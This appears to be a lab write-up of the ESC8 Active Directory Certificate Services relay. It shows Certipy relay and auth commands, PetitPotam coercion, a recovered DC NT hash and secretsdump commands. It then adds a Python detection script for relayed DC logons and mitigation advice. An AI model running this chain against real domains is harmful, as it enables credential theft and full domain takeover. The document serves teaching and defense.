ESC8 - with certipy

Certipy is an ADCS attack tool that automates a lot of these steps.

Let's do the same attack with Certipy. First install it, then set up the relay listener pointing at the CA and the DomainController template:

Install Certipy

sudo pip3 install certipy-ad
sudo certipy relay -ca 192.168.56.23 -template DomainController
  • Execute the coercion just as we did before with PetitPotam:

python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local
  • Now that we have the DC's certificate, we can use it to request a TGT and recover the DC's NT hash with:

sudo certipy auth -pfx baltimore.pfx -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759
  • With the TGT (or the NT hash) of the DC machine account, dump the domain secrets with secretsdump.py:

export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local

# or with the hash

secretsdump.py -hashes ':aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759' -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
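The whole chain works because the CA's web enrollment endpoint accepts the coerced DC's NTLM authentication over plain HTTP without Extended Protection for Authentication, so the relayed logon is indistinguishable from the real DC to the CA. On the relay target, however, the relay leaves a footprint: a domain-controller machine account (baltimore$ here) performs a network NTLM logon from an address that is not the DC itself. The script below is an added detection example written for this write-up (it is not part of the original notes, of Certipy, or of PetitPotam). It parses constructed log records modelled on Windows Security event 4624 fields, matches them against an inventory of DC accounts and their legitimate addresses, and flags NTLM network logons from anywhere else. The record format, the CA hostname ca.maryland.local, the attacker address 192.168.56.100 and the inventory are assumptions; baltimore$ and 192.168.56.31 come from the walkthrough above.

```python
"""Flag NTLM network logons of DC machine accounts from unexpected source addresses.

Added example for this ESC8 write-up; not code from the original notes or from
Certipy. The log records are constructed to resemble Windows Security event 4624
fields (TargetUserName, LogonType, AuthenticationPackageName, IpAddress); the exact
record format and the DC-to-IP inventory are assumptions.
"""
from dataclasses import dataclass

# Constructed inventory: the addresses each DC machine account legitimately logs on from.
# BALTIMORE$ / 192.168.56.31 are taken from the walkthrough; treat the mapping as an assumption.
DC_ACCOUNTS = {
    "BALTIMORE$": {"192.168.56.31"},
}


@dataclass(frozen=True)
class LogonEvent:
    event_id: int
    account: str
    domain: str
    logon_type: int
    auth_package: str   # "NTLM" or "Kerberos"
    source_ip: str
    target_host: str    # host that recorded the event (here the CA / web enrollment server)


def parse_event(line: str) -> LogonEvent:
    """Parse one semicolon-separated key=value record (constructed format) into a LogonEvent."""
    fields = dict(part.split("=", 1) for part in line.strip().split(";"))
    return LogonEvent(
        event_id=int(fields["EventID"]),
        account=fields["TargetUserName"],
        domain=fields["TargetDomainName"],
        logon_type=int(fields["LogonType"]),
        auth_package=fields["AuthenticationPackageName"],
        source_ip=fields["IpAddress"],
        target_host=fields["Computer"],
    )


def is_suspicious(ev: LogonEvent, inventory=DC_ACCOUNTS) -> bool:
    """True when a known DC machine account performs a network logon (type 3) over NTLM
    from an address that is not the DC itself. A coerced DC relayed by certipy relay
    looks exactly like this on the relay target; Kerberos logons cannot be relayed
    this way, so they are ignored."""
    if ev.event_id != 4624 or ev.logon_type != 3:
        return False
    if ev.auth_package.upper() != "NTLM":
        return False
    account = ev.account.upper()
    if account not in inventory:
        return False
    return ev.source_ip not in inventory[account]


def find_relayed_logons(lines):
    """Return the events from an iterable of records that match the relay footprint."""
    return [ev for ev in map(parse_event, lines) if is_suspicious(ev)]


# Constructed sample log as seen on the CA; 192.168.56.100 is an assumed attacker address.
SAMPLE_LOG = [
    "EventID=4624;Computer=ca.maryland.local;TargetUserName=BALTIMORE$;TargetDomainName=MARYLAND;"
    "LogonType=3;AuthenticationPackageName=NTLM;IpAddress=192.168.56.100",
    "EventID=4624;Computer=ca.maryland.local;TargetUserName=BALTIMORE$;TargetDomainName=MARYLAND;"
    "LogonType=3;AuthenticationPackageName=Kerberos;IpAddress=192.168.56.31",
    "EventID=4624;Computer=ca.maryland.local;TargetUserName=BALTIMORE$;TargetDomainName=MARYLAND;"
    "LogonType=3;AuthenticationPackageName=NTLM;IpAddress=192.168.56.31",
    "EventID=4624;Computer=ca.maryland.local;TargetUserName=jdoe;TargetDomainName=MARYLAND;"
    "LogonType=3;AuthenticationPackageName=NTLM;IpAddress=192.168.56.100",
]

if __name__ == "__main__":
    for ev in find_relayed_logons(SAMPLE_LOG):
        print(f"[!] possible NTLM relay of {ev.domain}\\{ev.account} "
              f"from {ev.source_ip} recorded on {ev.target_host}")
```

Only the first record is flagged: a DC machine account, NTLM, network logon, from an address the inventory does not associate with that DC. A Kerberos logon from the real DC and an NTLM logon from the DC's own address are both normal, and a user account is out of scope for this rule. In a real environment the same check should be fed from the CA's Security log and from the web enrollment IIS logs, and the fix that makes the relay fail outright is to require HTTPS with Extended Protection for Authentication on the web enrollment endpoint (or to disable NTLM on it).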
